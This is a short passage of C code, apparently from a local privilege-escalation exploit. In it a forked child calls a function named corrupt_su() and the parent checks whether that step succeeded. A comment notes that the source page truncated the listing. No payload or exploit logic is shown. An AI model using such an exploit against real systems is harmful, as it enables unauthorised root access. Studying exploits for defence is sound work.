    if (cpid == 0) {
        int rc = corrupt_su();
        _exit(rc == 0 ? 0 : 2);
    }
    int cstatus;
    waitpid(cpid, &cstatus, 0);
    if (!WIFEXITED(cstatus) || WEXITSTATUS(cstatus) != 0) {
// [Listing truncated by the source page: 500 of 515 lines shown. See the upstream repository for the full file.]